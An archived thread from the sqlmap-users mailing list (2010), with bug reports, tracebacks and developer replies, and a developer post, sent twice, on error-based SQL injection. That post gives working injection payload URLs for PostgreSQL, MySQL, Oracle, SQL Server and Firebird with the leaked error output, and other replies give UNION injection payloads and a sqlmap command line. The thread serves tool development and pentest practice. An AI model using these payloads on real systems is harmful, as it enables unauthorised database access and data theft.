> with the latest svn, any ideas?
>
> thanks
>
> -- Andreas
>
> ------------------------------------------------------------------------------
> Lotusphere 2011
> Register now for Lotusphere 2011 and learn how
> to connect the dots, take your collaborative environment
> to the next level, and enter the era of Social Business.
> http://p.sf.net/sfu/lotusphere-d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Andreas C. (MegaHz) <me...@me...> - 2010-12-15 02:39:53
|
hi guys,
i got the following error:
there were multiple injection points, please select the one to use for following injections:
tem, type: LIKE double quoted string (default)
[1] place: GET, parameter: pageid, type: Double quoted string
[q] Quit
> 1
[00:56:46] [INFO] testing Microsoft SQL Server
[00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r2684)
Python version: 2.6.1
Operating system: posix
Traceback (most recent call last):
File "./sqlmap.py", line 79, in main
start()
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py", line 412, in start
action()
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py", line 32, in action
setHandler()
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py", line 105, in setHandler
if handler.checkDbms():
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py", line 95, in checkDbms
result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py", line 506, in checkBooleanExpression
return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py", line 457, in getValue
value = __goBooleanProxy(booleanExpression, resumeValue)
File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py", line 100, in __goBooleanProxy
kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place)
KeyError: 5
[*] shutting down at: 00:56:46
with the latest svn, any ideas?
thanks
-- Andreas
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-13 00:00:09
|
Hi black zero. Thank you for your report. Find the fix with the latest update from our SVN repository. Kind regards. On Sun, Dec 12, 2010 at 8:56 PM, black zero <tim...@gm...> wrote: > my sqlmap.conf setting problem > > How should I do? > uCols = 1-20 > uCols = 20 I use if such no error > > true ? > > do not have problem? > > [*] starting at: 21:48:57 > > > [21:48:57] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry > your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the command line, the following > text and any information needed to reproduce the bug. The developers > will try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev (r2670) > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "sqlmap.py", line 71, in main > init(cmdLineOptions) > File "/home/john/sqlmap-dev/lib/core/option.py", line 1367, in init > __mergeOptions(inputOptions) > File "/home/john/sqlmap-dev/lib/core/option.py", line 1293, in __mergeOptions > configFileParser(inputOptions.configFile) > File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 90, in > configFileParser > configFileProxy(family, option, boolean, integer) > File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 35, in > configFileProxy > value = config.getint(section, option) > File "/usr/lib/python2.6/ConfigParser.py", line 340, in getint > return self._get(section, int, option) > File "/usr/lib/python2.6/ConfigParser.py", line 337, in _get > return conv(self.get(section, option)) > ValueError: invalid literal for int() with base 10: '1-20' > > [*] shutting down at: 21:48:57 > > ------------------------------------------------------------------------------ > Oracle to DB2 Conversion Guide: Learn learn about native support for PL/SQL, > new data types, scalar functions, improved concurrency, built-in packages, > OCI, SQL*Plus, data movement tools, best practices and more. > http://p.sf.net/sfu/oracle-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: black z. <tim...@gm...> - 2010-12-12 20:01:21
|
my sqlmap.conf setting problem How should I do? uCols = 1-20 uCols = 20 I use if such no error true ? do not have problem? [*] starting at: 21:48:57 [21:48:57] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev (r2670) Python version: 2.6.5 Operating system: posix Traceback (most recent call last): File "sqlmap.py", line 71, in main init(cmdLineOptions) File "/home/john/sqlmap-dev/lib/core/option.py", line 1367, in init __mergeOptions(inputOptions) File "/home/john/sqlmap-dev/lib/core/option.py", line 1293, in __mergeOptions configFileParser(inputOptions.configFile) File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 90, in configFileParser configFileProxy(family, option, boolean, integer) File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 35, in configFileProxy value = config.getint(section, option) File "/usr/lib/python2.6/ConfigParser.py", line 340, in getint return self._get(section, int, option) File "/usr/lib/python2.6/ConfigParser.py", line 337, in _get return conv(self.get(section, option)) ValueError: invalid literal for int() with base 10: '1-20' [*] shutting down at: 21:48:57 |
|
From: black z. <tim...@gm...> - 2010-12-12 19:56:36
|
my sqlmap.conf setting problem
How should I do?
uCols = 1-20
uCols = 20 I use if such no error
true ?
do not have problem?
[*] starting at: 21:48:57
[21:48:57] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the command line, the following
text and any information needed to reproduce the bug. The developers
will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r2670)
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
File "sqlmap.py", line 71, in main
init(cmdLineOptions)
File "/home/john/sqlmap-dev/lib/core/option.py", line 1367, in init
__mergeOptions(inputOptions)
File "/home/john/sqlmap-dev/lib/core/option.py", line 1293, in __mergeOptions
configFileParser(inputOptions.configFile)
File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 90, in
configFileParser
configFileProxy(family, option, boolean, integer)
File "/home/john/sqlmap-dev/lib/parse/configfile.py", line 35, in
configFileProxy
value = config.getint(section, option)
File "/usr/lib/python2.6/ConfigParser.py", line 340, in getint
return self._get(section, int, option)
File "/usr/lib/python2.6/ConfigParser.py", line 337, in _get
return conv(self.get(section, option))
ValueError: invalid literal for int() with base 10: '1-20'
[*] shutting down at: 21:48:57
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-12 10:58:39
|
Hi, Now it's my turn to present some new shinny new features of sqlmap from version 0.8 till now :) "Support for error-based sql injection in sqlmap and the research behind it" Great reference for error-based sql injection can be found in a paper: "METHODS OF QUICK EXPLOITATION OF BLIND SQL INJECTION" by Dmitry Evteev (www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf). The author described in a great way how to exploit error messages in four main DBMSes (MySQL, MSSQL, Oracle and PGSQL) to get the desired query output. Also, author has personally pointed us to some other great resources and has given us some hints (like error based vector for MySQL < 5). We've used info from that paper and from other great references, like Alexander Kornbrust's: 'Tutorial: Oracle SQL Injection in Webapps' (http://blog.red-database-security.com/2009/01/17/tutorial-oracle-sql-injection- in-webapps-part-i/print/), forum RDot's "MySQL 3 Error Based SQLi" (https://rdot.org/forum/showthread.php?t=503), red database security's "Oracle SQL Injection in web applications " (http://www.red-database-security.com/whitepaper/oracle_sql_injection_web.html), but, nevertheless, never underestimate the knowledge you get while implementing this kind of stuff. For start, we should present some samples from our manual tests: -------------- Backend DBMS: PostgreSQL Request: http://xxx.xxx.xxx.xxx/pgsql/get_int.php?id=1 and 1=cast((select CURRENT_USER::text) as numeric) Response: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: "testuser" SQL error: ERROR: invalid input syntax for type numeric: "testuser" -------------- Backend DBMS: MySQL Request: http://xxx.xxx.xxx.xxx/mysql/get_int.php?id=1 and (select 1 from(select count(*),concat ((SELECT CURRENT_USER()),floor(rand(0)*2))x from information_schema.tables group by x)a)-- Response: SQL error: Duplicate entry 'root@localhost1' for key 'group_key' -------------- Backend DBMS: Oracle Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 and 1=(SELECT UPPER( XMLType(chr(60)||chr(58)||chr(58)||(SELECT USER FROM DUAL)||chr(62))) FROM DUAL) Response: Warning: oci_execute() [function.oci-execute]: ORA-31011: XML parsing failed ORA-19202: Error occurred in XML processing LPX-00110: Warning: invalid QName "::SYS" (not a Name) Error at line 1 ORA-06512: at "SYS.XMLTYPE" Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 AND 1=UTL_INADDR.GET_HOST_ADDRESS ((SELECT USER FROM DUAL)) Response: Warning: oci_execute() [function.oci-execute]: ORA-29257: host SYS unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR" Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 AND 1=CTXSYS.DRITHSX.SN(1, (SELECT USER FROM DUAL)) Response: ORA-20000: Oracle Text error: DRG-11701: thesaurus SYS does not exist ORA-06512: at "CTXSYS.DRUE", line 160 ORA-06512: at "CTXSYS.DRITHSX" -------------- Backend DBMS: MS SQL Server Request: http://xxx.xxx.xxx.xxx/mssql/iis/get_int.asp?id=1' and 1=convert(int,(SELECT SYSTEM_USER))-- Response: Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'sa' to data type int. -------------- Backend DBMS: Firebird (world premiere!) Request: http://xxx.xxx.xxx.xxx/firebird/get_int.php?id=1 AND 1=(SELECT CURRENT_USER FROM RDB$DATABASE) Response: Warning: ibase_fetch_assoc() [function.ibase-fetch-assoc]: conversion error from string "SYSDBA" -------------- There are really two conditions you need to satisfy: 1) You need to be able to automatically recognize error message and parse desired (sub)query's result out of it 2) Error should be provocated for any instance of (sub)query you use Optimal way to solve these two conditions is the usage of proper prefix and suffix. As can be seen, lots of error vectors are based on a conversion of data from string format to numerical. To "break" those you only need to add a non-numerical character into prefix (and/or suffix), and you'll get something like: http://192.168.117.128/sqlmap/pgsql/get_int.php?id=1 AND 1=cast('prefix_'|| (select count (*)||'_suffix' from users) as numeric) Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: "prefix_4_suffix" SQL error: ERROR: invalid input syntax for type numeric: "prefix_4_suffix" Recognition of a valid "error response" and parsing of result in these kind of cases is pretty straighforward. You only need to choose some pretty random and suffix which you don't expect in response body and that's it. Other's are pretty the same, and don't have any "special" conditions, except Oracle's "XMLType". "XMLType is a system-defined opaque type for handling XML data. XMLType has predefined member functions on it to extract XML nodes and fragments." (http://download.oracle.com/docs/cd/B10500_01/appdev.920/a96616/arxml24.htm). Basically, when using this error vector you need to provocate Oracle's XML parser with usage of invalid XML syntax. The thing is that parser can be broken in many ways, but to display a proper error message you need to start with a character '<' (chr(60) in our case). After that parser expects a proper "identifier" (all those that wrote it's own compiler should know what this means) - variable names, method names, node names, ... are all identifiers. In most cases identifiers could be described with the following regular expression [a-zA-Z][a-zA-Z0-9_]*, which in plain-speak means that the first letter should be an alphabetical one, while the others can be letters, numbers and a letter '_'. Well, Oracle's XML parser best (mis)behaves with XMLTYPE('<:........'). Notice that second character ':'. Because of it parser goes nunners and displays that wonderful error message. From our research other characters more or less produce messages like: "invalid character 41(')')" or "element-start tag is not well formed". Also, XMLType is a piece of work in one more way. If the provided (sub)query like: "SELECT banner FROM v$version WHERE ROWNUM=1" returns a multi-word (space delimited) result, error message will return only a first word, trimming the rest. To prevent this we've used a character replacement in an used (sub)query (...REPLACE((SELECT banner FROM v$version WHERE ROWNUM=1),' ', <space replacement>)). One more "piece of work" is the MySQL error vector. From our research we've noticed that if the number of returned characters in the (sub)query is more than some value, then "Duplicate row" is returned instead of the proper error message. These are "safe" lengths we've noticed in our tests: >> 494 - Debian 5.0 (32-bit), MySQL 5.1.41-3~bpo50+11 >> 153 - Ubuntu 8.04 (32-bit), MySQL 5.0.51a-3ubuntu5 >> 129 - Windows XP SP3 (32-bit), MySQL 5.1.41 Everything above returns: "Duplicate row". Nobody is sure for now why is this happening, but for sure it's version/platform dependent (as proven by us). "Patch" for this one is to trim the (sub)query result to some "predefined safe value" that in most cases won't deal problems. We've chosen 100, which is lesser than any of the provided values. To provocate errors in all error vectors and to properly recognize/parse (sub)query result from returned error message, in sqlmap we are using prefix and suffix in a form ':<randomalphachar><randomalphachar><randomalphachar>:'. This way we are pretty sure that they will be unique in the returned response, and we are able to easily extract all data between them. Right now sqlmap (dev/r2667) automatically tries to find and exploit basic error-based vectors for major DBMS-es, while the others (2 more for Oracle and 1 for Firebird) can be turned on with usage of a higher --level. >From my personal point of view I am very happy that we've implemented this one, not so much "because it's fast", but because other tools had an etiquette that they can exploit error based sql injections, while sqlmap couldn't. Now situation is different in a way that, and I can take a full responsibility, that no other tool can be measured with sqlmap in this segment, and we'll for sure further "stay" in touch with new error vectors found. Kind regards. -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-12 10:33:37
|
Hi, Now it's my turn to present some new shinny new features of sqlmap from version 0.8 till now :) "Support for error-based sql injection in sqlmap and the research behind it" Great reference for error-based sql injection can be found in a paper: "METHODS OF QUICK EXPLOITATION OF BLIND SQL INJECTION" by Dmitry Evteev (www.ptsecurity.com/download/PT- devteev-FAST-blind-SQL-Injection.pdf). The author described in a great way how to exploit error messages in four main DBMSes (MySQL, MSSQL, Oracle and PGSQL) to get the desired query output. Also, author has personally pointed us to some other great resources and has given us some hints (like error based vector for MySQL < 5). We've used info from that paper and from other great references, like Alexander Kornbrust's: 'Tutorial: Oracle SQL Injection in Webapps' (http://blog.red-database- security.com/2009/01/17/tutorial-oracle-sql-injection-in-webapps-part-i/print/), forum RDot's "MySQL 3 Error Based SQLi" (https://rdot.org/forum/showthread.php?t=503), red database security's "Oracle SQL Injection in web applications " (http://www.red-database- security.com/whitepaper/oracle_sql_injection_web.html), but, nevertheless, never underestimate the knowledge you get while implementing this kind of stuff. For start, we should present some samples from our manual tests: -------------- Backend DBMS: PostgreSQL Request: http://xxx.xxx.xxx.xxx/pgsql/get_int.php?id=1 and 1=cast((select CURRENT_USER::text) as numeric) Response: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: "testuser" in ... on line 35 SQL error: ERROR: invalid input syntax for type numeric: "testuser" -------------- Backend DBMS: MySQL Request: http://xxx.xxx.xxx.xxx/mysql/get_int.php?id=1 and (select 1 from(select count(*),concat ((SELECT CURRENT_USER()),floor(rand(0)*2))x from information_schema.tables group by x)a)-- Response: SQL error: Duplicate entry 'root@localhost1' for key 'group_key' -------------- Backend DBMS: Oracle Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 and 1=(SELECT UPPER(XMLType(chr(60)||chr(58)|| chr(58)||(SELECT USER FROM DUAL)||chr(62))) FROM DUAL) Response: Warning: oci_execute() [function.oci-execute]: ORA-31011: XML parsing failed ORA-19202: Error occurred in XML processing LPX-00110: Warning: invalid QName "::SYS" (not a Name) Error at line 1 ORA-06512: at "SYS.XMLTYPE", line 301 ORA-06512: at line 1 in ... on line 39 Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 AND 1=UTL_INADDR.GET_HOST_ADDRESS ((SELECT USER FROM DUAL)) Response: Warning: oci_execute() [function.oci-execute]: ORA-29257: host SYS unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in ... on line 39 Request: http://xxx.xxx.xxx.xxx/oracle/get_int.php?id=1 AND 1=CTXSYS.DRITHSX.SN(1, (SELECT USER FROM DUAL)) Response: Warning: ibase_fetch_assoc() [function.ibase-fetch-assoc]: conversion error from string "SYSDBA" in ... on line 47 SQL error: -------------- Backend DBMS: MS SQL Server Request: http://xxx.xxx.xxx.xxx/mssql/iis/get_int.asp?id=1' and 1=convert(int,(SELECT SYSTEM_USER))-- Response: Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'sa' to data type int. ..., line 27 -------------- Backend DBMS: Firebird (world premiere!) Request: http://xxx.xxx.xxx.xxx/firebird/get_int.php?id=1 AND 1=(SELECT CURRENT_USER FROM RDB $DATABASE) Response: Warning: ibase_fetch_assoc() [function.ibase-fetch-assoc]: conversion error from string "SYSDBA" in ... on line 47 -------------- There are really two conditions you need to satisfy: 1) You need to be able to automatically recognize error message and parse desired (sub)query's result out of it 2) Error should be provocated for any instance of (sub)query you use Optimal way to solve these two conditions is the usage of proper prefix and suffix. As can be seen, lots of error vectors are based on a conversion of data from string format to numerical. To "break" those you only need to add a non-numerical character into prefix (and/or suffix), and you'll get something like: http://192.168.117.128/sqlmap/pgsql/get_int.php?id=1 AND 1=cast('prefix_'||(select count (*)||'_suffix' from users) as numeric) Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: "prefix_4_suffix" in .../pgsql.inc.php on line 35 SQL error: ERROR: invalid input syntax for type numeric: "prefix_4_suffix" Recognition of a valid "error response" and parsing of result in these kind of cases is pretty straighforward. You only need to choose some pretty random prefix and suffix which you don't expect in response body and that's it. Other's are pretty the same, and don't have any "special" conditions, except Oracle's "XMLType". "XMLType is a system-defined opaque type for handling XML data. XMLType has predefined member functions on it to extract XML nodes and fragments." (http://download.oracle.com/docs/cd/B10500_01/appdev.920/a96616/arxml24.htm). Basically, when using this error vector you need to provocate Oracle's XML parser with usage of invalid XML syntax. The thing is that parser can be broken in many ways, but to display a proper error message you need to start with a character '<' (chr(60) in our case). After that parser expects a proper "identifier" (all those that wrote it's own compiler should know what this means) - variable names, method names, node names, ... are all identifiers. In most cases identifiers could be described with the following regular expression [a-zA-Z][a-zA-Z0-9_]*, which in plain-speak means that the first letter should be an alphabetical one, while the others can be letters, numbers and a letter '_'. Well, Oracle's XML parser best (mis)behaves with XMLTYPE('<:........'). Notice that second character ':'. Because of it parser goes nunners and displays that wonderful error message. >From our research other characters more or less produce messages like: "invalid character 41 (')')" or "element-start tag is not well formed". Also, XMLType is a piece of work in one more way. If the provided (sub)query like: "SELECT banner FROM v$version WHERE ROWNUM=1" returns a multi-word (space delimited) result, error message will return only a first word, trimming the rest. To prevent this we've used a character replacement in an used (sub)query (...REPLACE((SELECT banner FROM v$version WHERE ROWNUM=1),' ',<space replacement>)). One more "piece of work" is the MySQL error vector. From our research we've noticed that if the number of returned characters in the (sub)query is more than some value, then "Duplicate row" is returned instead of the proper error message. These are "safe" lengths we've noticed in our tests: >> 494 - Debian 5.0 (32-bit), MySQL 5.1.41-3~bpo50+11 >> 153 - Ubuntu 8.04 (32-bit), MySQL 5.0.51a-3ubuntu5 >> 129 - Windows XP SP3 (32-bit), MySQL 5.1.41 Everything above returns: "Duplicate row". Nobody is sure for now why is this happening, but for sure it's version/platform dependent (as proven by us). "Patch" for this one is to trim the (sub)query result to some "predefined safe value" that in most cases won't deal problems. We've chosen 100, which is lesser than any of the provided values. To provocate errors in all error vectors and to properly recognize/parse (sub)query result from returned error message, in sqlmap we are using prefix and suffix in a form ':<randomalphachar> <randomalphachar><randomalphachar>:'. This way we are pretty sure that they will be unique in the returned response, and we are able to easily extract all data between them. Right now sqlmap (dev/r2667) automatically tries to find and exploit basic error-based vectors for major DBMS-es, while the others (2 more for Oracle and 1 for Firebird) can be turned on with usage of a higher --level. >From my personal point of view I am very happy that we've implemented this one, not so much "because it's fast", but because other tools had an etiquette that they can exploit error based sql injections, while sqlmap couldn't. Now situation is different in a way that, and I can take a full responsibility, that no other tool can be measured with sqlmap in this segment, and we'll for sure further "stay" in touch with new error vectors found. Kind regards. -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-08 22:02:38
|
Hi Gavin. In your case most probably 'information_schema' is missing needed for a successful out-of-box table enumeration on MySQL>=5. Please, update to the latest revision from our SVN repository and try it again. Now, when information_schema is missing we offer an automatic brute force checking of common table existence: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev KR On Wed, Dec 8, 2010 at 10:56 PM, Gavin Jones <gav...@gm...> wrote: > Hi There, > > I was able to find a SQL injection issue on one of the parameters of > the application that I am looking at and using sqlmap 0.8 I was able > to extract some information using from the MySQL back end such as the > banner and the user information shown below: > > banner: '5.1.50' > current user: 'dbadmin@localhost' > current user is DBA: 'False' > > However when I tried to enumerate the tables in the DB sqlmap seemed > to ignore the version returned by the banner that is cached in its > session file and insisted that it was a MySQL 4 DBMS and then > subsequently failed to enumerate the tables .... > > Should it be ignoring the version string returned by the banner to > make these queries? > > Regards, > Gavin > > ------------------------------------------------------------------------------ > This SF Dev2Dev email is sponsored by: > > WikiLeaks The End of the Free Internet > http://p.sf.net/sfu/therealnews-com > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Gavin J. <gav...@gm...> - 2010-12-08 21:56:20
|
Hi There, I was able to find a SQL injection issue on one of the parameters of the application that I am looking at and using sqlmap 0.8 I was able to extract some information using from the MySQL back end such as the banner and the user information shown below: banner: '5.1.50' current user: 'dbadmin@localhost' current user is DBA: 'False' However when I tried to enumerate the tables in the DB sqlmap seemed to ignore the version returned by the banner that is cached in its session file and insisted that it was a MySQL 4 DBMS and then subsequently failed to enumerate the tables .... Should it be ignoring the version string returned by the banner to make these queries? Regards, Gavin |
|
From: Miroslav S. <mir...@gm...> - 2010-12-08 21:22:36
|
Hi Spencer. Thank you for your report. This is the "problem" that could happen for example in LiveCD distributions. Hence, we've made a patch for it. Please update to the latest version from our repository to have it fixed (along with lots of other problems fixed since 0.8): svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Kind regards. On Wed, Dec 8, 2010 at 5:23 PM, Spencer J. McIntyre <smc...@se...> wrote: > [11:21:18] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: > sqlmap version: 0.8 > Python version: 2.7 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > start() > File "/opt/sqlmap/lib/controller/controller.py", line 138, in start > createTargetDirs() > File "/opt/sqlmap/lib/core/target.py", line 208, in createTargetDirs > os.makedirs(conf.outputPath, 0755) > File "/usr/lib64/python2.7/os.py", line 157, in makedirs > mkdir(name, mode) > OSError: [Errno 13] Permission denied: '/opt/sqlmap/output/www.sae.org' > > [*] shutting down at: 11:21:18 > > > I ran SQLMap from opt with user permissions > ------------------------------------------------------------------------------ > This SF Dev2Dev email is sponsored by: > > WikiLeaks The End of the Free Internet > http://p.sf.net/sfu/therealnews-com > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Spencer J. M. <smc...@se...> - 2010-12-08 16:35:03
|
[11:21:18] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.8
Python version: 2.7
Operating system: linux2
Traceback (most recent call last):
File "./sqlmap.py", line 77, in main
start()
File "/opt/sqlmap/lib/controller/controller.py", line 138, in start
createTargetDirs()
File "/opt/sqlmap/lib/core/target.py", line 208, in createTargetDirs
os.makedirs(conf.outputPath, 0755)
File "/usr/lib64/python2.7/os.py", line 157, in makedirs
mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/opt/sqlmap/output/www.sae.org'
[*] shutting down at: 11:21:18
I ran SQLMap from opt with user permissions
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-05 10:43:27
|
python sqlmap.py -u "target url" --union-test -v 2 --level 3 --union-char 1 --union-cols 9-11 Good luck! On 4 December 2010 19:44, Shadow Holy <tsh...@gm...> wrote: > i got something working like: > > id=-1'+union+all+select+1,2,3,4,5.6,7,8,9,10+and+'1'='1 > > how to specify this to sqlmap? > > ------------------------------------------------------------------------------ > What happens now with your Lotus Notes apps - do you make another costly > upgrade, or settle for being marooned without product support? Time to move > off Lotus Notes and onto the cloud with Force.com, apps are easier to build, > use, and manage than apps on traditional platforms. Sign up for the Lotus > Notes Migration Kit to learn more. http://p.sf.net/sfu/salesforce-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-05 10:38:16
|
WebGoat, http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project DVWA, http://www.dvwa.co.uk/ Mutillidae, http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 A more comprehensive guide, including online applications can be found here, http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/ If you know about SQL injections in any of those applications that sqlmap does not recognize (try with latest version and with --level 5 --risk 3), please let me know. Cheers, Bernardo On 3 December 2010 22:33, Steve Pinkham <ste...@gm...> wrote: > On 12/03/2010 05:07 PM, Wil Ruiz wrote: >> Anyone have good websites that they like to test on? I've done most of > my testing on Acunetix. I'd like to expand my test cases. I'm talking > legally of course; perhaps an environment like Damn Vulnerable Linux. > Thank you. > > > Moth (http://sourceforge.net/projects/w3af/files/moth/moth/) and OWASP > BWA (http://code.google.com/p/owaspbwa/) are good choices with some > synthetic broken apps as well as old vulnerable versions of open source > apps. > > The Phoenix OWASP chapter also has a list of online targets (and other > information). Somewhat old, but covers most of what's out there. > > http://www.owasp.org/index.php/Phoenix/Tools > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > > ------------------------------------------------------------------------------ > Oracle to DB2 Conversion Guide: New IBM DB2 features make compatibility easy. > Learn about native support for PL/SQL, new data types, scalar functions, > improved concurrency, built-in packages, OCI, SQL*Plus, data movement tools, > best practices and more - all designed to run applications on both DB2 and > Oracle platforms. http://p.sf.net/sfu/oracle-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Shadow H. <tsh...@gm...> - 2010-12-04 19:44:41
|
i got something working like: id=-1'+union+all+select+1,2,3,4,5.6,7,8,9,10+and+'1'='1 how to specify this to sqlmap? |
|
From: Steve P. <ste...@gm...> - 2010-12-03 22:33:26
|
On 12/03/2010 05:07 PM, Wil Ruiz wrote: > Anyone have good websites that they like to test on? I've done most of my testing on Acunetix. I'd like to expand my test cases. I'm talking legally of course; perhaps an environment like Damn Vulnerable Linux. Thank you. Moth (http://sourceforge.net/projects/w3af/files/moth/moth/) and OWASP BWA (http://code.google.com/p/owaspbwa/) are good choices with some synthetic broken apps as well as old vulnerable versions of open source apps. The Phoenix OWASP chapter also has a list of online targets (and other information). Somewhat old, but covers most of what's out there. http://www.owasp.org/index.php/Phoenix/Tools -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Wil R. <wil...@gm...> - 2010-12-03 22:07:25
|
Anyone have good websites that they like to test on? I've done most of my testing on Acunetix. I'd like to expand my test cases. I'm talking legally of course; perhaps an environment like Damn Vulnerable Linux. Thank you. Sent from my iPhone |
|
From: Miroslav S. <mir...@gm...> - 2010-12-02 18:09:25
|
